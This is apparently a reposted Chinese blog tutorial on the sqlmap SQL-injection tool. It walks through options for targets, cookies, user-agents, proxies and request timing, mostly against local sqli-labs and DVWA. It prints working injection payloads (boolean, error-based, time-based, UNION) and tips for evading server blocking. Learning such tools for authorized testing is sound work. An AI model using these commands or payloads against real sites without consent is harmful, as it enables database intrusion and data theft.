SQLMAP使用教程
一、SQL注入
所谓SQL注入,就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
具体来说,它是利用现有应用程序,将SQL命令注入到后台数据库引擎执行的能力,它可以通过在web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。
SQL注入可能发生在未知HTTP数据包中任意位置。
二、SQL输出级别
Sqlmap的输出信息按从简到繁共分为7个级别依次为0、1、2、3、4、5和6。使用参数-v来指定某个等级,如使用参数 -v 6来指定输出级别为6。
- 0:只显示Python的tracebacks信息、错误信息[ERROR]和关键信息[CRITICAL]
- 1:同时显示普通信息[INFO]和警告信息[WARNING]
- 2:同时显示调试信息[DEBUG]
- 3:同时显示注入使用的攻击荷载
- 4:同时显示HTTP请求头
- 5:同时显示HTTP响应头
- 6:同时显示HTTP响应体
默认输出级别为1,一般输出到v3即可。
三、SQLMAP获取目标
1. sqlmap直连数据库
(1)服务型数据库-MySQL、Oracle等:
python3 sqlmap.py -d "mysql://用户名:密码@地址:端口/数据库名字" -f --banner --dbs --users
其中,banner是指纹,包括数据库的一些详细信息。
使用举例:
python sqlmap.py -d "mysql://root:root@127.0.0.1:3306/mysql" -f --banner
输出
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:16:55 /2020-02-25/
[18:16:55] [INFO] connection to MySQL server '127.0.0.1:3306' established
[18:16:55] [INFO] testing MySQL
[18:16:55] [INFO] resumed: [['1']]...
[18:16:55] [INFO] confirming MySQL
[18:16:55] [INFO] resumed: [['1']]...
[18:16:55] [INFO] the back-end DBMS is MySQL
[18:16:55] [INFO] fetching banner
[18:16:55] [INFO] resumed: [['5.7.26']]...
[18:16:55] [INFO] actively fingerprinting MySQL
[18:16:55] [INFO] resumed: [['1']]...
[18:16:55] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
comment injection fingerprint: MySQL 5.7.26
banner: '5.7.26'
[18:16:55] [INFO] connection to MySQL server '127.0.0.1:3306' closed
[*] ending @ 18:16:55 /2020-02-25/
返回了一些数据库的基本信息如数据库版本等。
返回结果较快,可能是因为提前进行了一些探测,生成了缓存。
再如:
python sqlmap.py -d "mysql://root:root@127.0.0.1:3306/mysql" -f --banner --users
输出
___
__H__
___ ___[.]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:20:41 /2020-02-25/
[18:20:42] [INFO] connection to MySQL server '127.0.0.1:3306' established
[18:20:42] [INFO] testing MySQL
[18:20:42] [INFO] resumed: [['1']]...
[18:20:42] [INFO] confirming MySQL
[18:20:42] [INFO] resumed: [['1']]...
[18:20:42] [INFO] the back-end DBMS is MySQL
[18:20:42] [INFO] fetching banner
[18:20:42] [INFO] resumed: [['5.7.26']]...
[18:20:42] [INFO] actively fingerprinting MySQL
[18:20:42] [INFO] resumed: [['1']]...
[18:20:42] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
comment injection fingerprint: MySQL 5.7.26
banner: '5.7.26'
[18:20:42] [INFO] fetching database users
[18:20:42] [INFO] resumed: [["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'roo
t'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localh
ost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["
'root'@'localhost'"], ["'root'@'localhost'"]]...
database management system users [1]:
[*] 'root'@'localhost'
[18:20:42] [INFO] connection to MySQL server '127.0.0.1:3306' closed
[*] ending @ 18:20:42 /2020-02-25/
在之前的基础上,返回的内容增加了用户。
再如:
python sqlmap.py -d "mysql://root:root@127.0.0.1:3306/mysql" -f --banner --users --dbs
输出
___
__H__
___ ___[)]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [(] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:25:20 /2020-02-25/
[18:25:20] [INFO] connection to MySQL server '127.0.0.1:3306' established
[18:25:20] [INFO] testing MySQL
[18:25:20] [INFO] resumed: [['1']]...
[18:25:20] [INFO] confirming MySQL
[18:25:20] [INFO] resumed: [['1']]...
[18:25:20] [INFO] the back-end DBMS is MySQL
[18:25:20] [INFO] fetching banner
[18:25:20] [INFO] resumed: [['5.7.26']]...
[18:25:20] [INFO] actively fingerprinting MySQL
[18:25:20] [INFO] resumed: [['1']]...
[18:25:20] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
comment injection fingerprint: MySQL 5.7.26
banner: '5.7.26'
[18:25:20] [INFO] fetching database users
[18:25:20] [INFO] resumed: [["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'roo
t'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localh
ost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["'root'@'localhost'"], ["
'root'@'localhost'"], ["'root'@'localhost'"]]...
database management system users [1]:
[*] 'root'@'localhost'
[18:25:20] [INFO] fetching database names
[18:25:20] [INFO] resumed: [['information_schema'], ['challenges'], ['demo'], ['demo1125'], ['demo1204'], ['dvwa'], ['jingdong'], ['mysql'], ['performance
_schema'], ['pythontest'], ['security'], ['sys']]...
available databases [12]:
[*] challenges
[*] demo
[*] demo1125
[*] demo1204
[*] dvwa
[*] information_schema
[*] jingdong
[*] mysql
[*] performance_schema
[*] pythontest
[*] security
[*] sys
[18:25:20] [INFO] connection to MySQL server '127.0.0.1:3306' closed
[*] ending @ 18:25:20 /2020-02-25/
在之前的基础上,返回的内容增加了数据库。
(2)文件型数据库-SQLite
2. sqlmap指定目标URL
sqlmap直接对单一URL探测,参数使用 -u或者 –url。
url格式为:
http(s)://targeturl/[:port/]/
例如:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=2 --banner
输出
___
__H__
___ ___[']_____ ___ ___ {1.4.2.31#dev}
|_ -| . [,] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:37:12 /2020-02-25/
[18:37:12] [INFO] testing connection to the target URL
[18:37:12] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:37:12] [INFO] testing if the target URL content is stable
[18:37:12] [INFO] target URL content is stable
[18:37:12] [INFO] testing if GET parameter 'id' is dynamic
[18:37:12] [INFO] GET parameter 'id' appears to be dynamic
[18:37:12] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[18:37:13] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[18:37:13] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[18:37:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:37:17] [WARNING] reflective value(s) found and filtering out
[18:37:17] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[18:37:17] [INFO] testing 'Generic inline queries'
[18:37:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[18:37:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[18:37:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[18:37:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[18:37:17] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[18:37:17] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[18:37:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:37:17] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[18:37:17] [INFO] testing 'MySQL inline queries'
[18:37:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[18:37:17] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[18:37:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[18:37:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[18:37:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[18:37:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[18:37:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[18:37:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:37:28] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[18:37:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:37:28] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:37:28] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically e
xtending the range for current UNION query injection technique test
[18:37:28] [INFO] target URL appears to have 3 columns in query
[18:37:28] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2' AND 7360=7360 AND 'lcZO'='lcZO
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=2' AND (SELECT 4240 FROM(SELECT COUNT(*),CONCAT(0x716a787171,(SELECT (ELT(4240=4240,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.PLUGINS GROUP BY x)a) AND 'DARZ'='DARZ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=2' AND (SELECT 9537 FROM (SELECT(SLEEP(5)))eRXY) AND 'MqRr'='MqRr
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-1033' UNION ALL SELECT NULL,NULL,CONCAT(0x716a787171,0x454766684a4352517a444b547a68524a6f744f4e6f7770796e6446515668715a516c424948495449,0
x7176627071)-- -
---
[18:37:28] [INFO] the back-end DBMS is MySQL
[18:37:28] [INFO] fetching banner
[18:37:28] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[18:37:28] [INFO] fetched data logged to text files under 'xxxx/sqlmap/output/127.0.0.1'
[*] ending @ 18:37:28 /2020-02-25/
其中有:
Type: boolean-based blind表示布尔类型盲注;
Payload: id=2’ AND 7360=7360 AND ‘lcZO’=’lcZO表示查询条件,即url后的参数。
用在连接后能正常访问到,如图
存在sql注入点和动态网页才能访问到,如?后的参数,如id=2与数据库进行了交互,此时才能访问到,如果是静态网页、未与数据库进行交互是探测不到的。
url不能加引号,否则会提示url无效。
3. sqlmap读取不同文件类型进行SQL注入
(1)为便于搜索引擎收录,许多网站专门为搜索引擎生成了xml格式的站点地图,参数是 -x。
(2)从多行文本格式文件读取多个目标,对多个目标进行探测,参数是 -m。
写一个target.txt,内容为:
www.target2.com/vuln2.asp?id=1
www.target3.com/vuln3/id/1*
www.target1.com/vuln1.php?q=foobar
测试:
python sqlmap.py -m "xxx/target.txt" --banner
(3)可以将一个HTTP请求保存在文件中,然后使用参数 -r。
并保存到target.txt中,内容示例如下:
GET /sqli-labs/Less-2/?id=3 HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF; PHPSESSID=e0c8pbo1jmiji6fjb5gl5e0nug
测试:
python sqlmap.py -r "xxx/target.txt" --banner
(4)从配置文件sqlmap.conf中读取目标探测,参数是 -c
python sqlmap.py -c sqlmap.conf
三、SQLMAP请求参数
HTTP请求有很多种方法(method),可以在不同位置(GET、POST、cookie和User-Agent等)携带不同参数。往往只有在特定位置携带了特定参数以特定方法发起的请求才是合法有效的请求。
Sqlmap运行时除了需要指定目标,有时还需要指定HTTP请求的一些细节。
1. HTTP方法
一般来说,Sqlmap能自动判断出是使用GET方法还是POST方法,但在某些情况下需要的可能是PUT等很少见的方法,此时就需要用参数 –method来指定方法。
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-2/?id=3 --banner -v 5 --method='put'
显然请求方法由默认方法get变为put。
大多数情况不需要指定请求方法。
2. sqlmap设置post提交参数
参数:
–data= “xxx”
默认情况下,用于执行HTTP请求的HTTP方法是GET,但是可以通过提供在POST请求中发送的数据隐式的将其改为POST。这些数据作为参数,被用于SQL注入检测。
通过以下方法获取要传入的参数:
得到参数如下:
uname=admin&passwd=admin&submit=Submit
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-11/index.php --data="uname=admin&passwd=admin&submit=Submit" --banner
3.sqlmap中设置cookie参数
常用参数:
–cookie
–cookie-del
–load-cookies
–drop-set-cookie
使用场景一:
web应用程序具有基于cookie验证的过程,要测试的页面只有在登录状态下才能访问,登录状态用cookie识别,即利用cookie登录网站。
登录dvwa进行配置如下:
得到测试链接:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#。
不带cookie进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-11/index.php --data="uname=admin&passwd=admin&submit=Submit" --banner
获取cookie如下:
security=low; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF; PHPSESSID=e0c8pbo1jmiji6fjb5gl5e0nug
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKX FpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF; PHPSESSID=e0c8pbo1jmiji6fjb5gl5e0nug" --banner --dbs
获取当前数据库进行测试:
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKX FpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF; PHPSESSID=e0c8pbo1jmiji6fjb5gl5e0nug" --banner --current-db
使用场景二:
想利用cookie值上的SQL注入漏洞。想要检测是否存在cookie注入。
sqlmap使用cookie过程:
- 登录或浏览页面
- 找到cookie
- 在sqlmap中使用–cookie cookie值
进行登录获取cookie演示如下:
网页显示的cookie和开发者工具里的cookie值并不一样,显示的是response的cookie,开发者工具里显示的是request的cookie,测试时使用显示的cookie。
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-20/index.php" --cookie "uname=admin" -- level 2 --banner
说明:
必须指定level大于等于2时才会显示出cookie注入的信息;
响应头中有Set-Cookie参数时,sqlmap会自动加载Set-Cookie的值进行探测,要想不用这些值,需要加上参数 –drop-set-cookie。
4. sqlmap中设置user-agent
默认情况下,sqlmap使用以下用户代理执行HTTP请求:
sqlmap/1.0-dev-xxxx(http://sqlmap.org)
sqlmap指定user-agent,使用参数
–user-agent = ‘指定的user-agent’
指定请求头:
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-20/index.php" --cookie "uname=admin" -- level 6 --banner --user-agent="Mozilla/5.0 (Windows NT 10. 0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36"
使用随机请求头:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-20/index.php --cookie "uname=admin" --level 2 --banner --random-agent -v 5 --banner
再次进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-18/index.php --random-agent -v 5 --banner --level 3
5. sqlmap中设置代理
sqlmap中设置代理的参数:
- –proxy
设置HTTP代理服务器位置 格式:–proxy http(s): //ip[端口] - –proxy-cred
设置HTTP代理服务器认证信息 格式:–proxy-cred user:pwd - –proxy-file
设置多条代理在文件中 - –ignore-proxy
当希望通过忽略系统范围内的HTTP(S)代理服务器设置来针对本地网络的目标部
6. sqlmap中设置延迟
参数:
–delay 0
sqlmap探测过程中会发送大量探测Payload到目标,如果默认情况过快的发包速度会导致目标预警。 为了避免这样的情况发生,可以在探测设置sqlmap发包延迟。
默认情况下,不设置延迟。
7. sqlmap中设置超时
参数:
–timeout 30
在考虑超时HTTP请求之前,可以指定等待的秒数,有效值是一个浮点数,比如10.5秒。
默认是30秒。
8. sqlmap中设置超时重试次数
参数:
–retries 3
设置对应重试次数。
默认情况下重试3次。
9. sqlmap中设置随即参数
参数:
–randomize 参数名称
sqlmap可以指定要在每次请求期间随机更改其值的参数名称,长度和类型要和提供的原始值保持一致。
10. sqlmap中设置忽略401
如果测试站点偶尔返回HTTP错误401,而你想忽略它并在不提供适当凭证的情况下继续测试,可以使用 –ignore-401来忽略未验证错误。
11. 避免错误请求过多而被屏蔽
有时服务器检测到某个客户端错误请求过多会对其进行屏蔽,而Sqlmap的测试往往会产生大量错 误请求,为避免被屏蔽,可以时不时的产生几个正常请求以迷惑服务器。
参数:
- –safe-url
隔一会就访问一下的安全URL - –safe-post
访问安全URL时携带的POST数据 - –safe-req
从文件中载入安全HTTP请求 - –safe-freq
每次测试请求之后都会访问一下的安全URL
原创文章,作者:carmelaweatherly,如若转载,请注明出处:https://blog.ytso.com/274270.html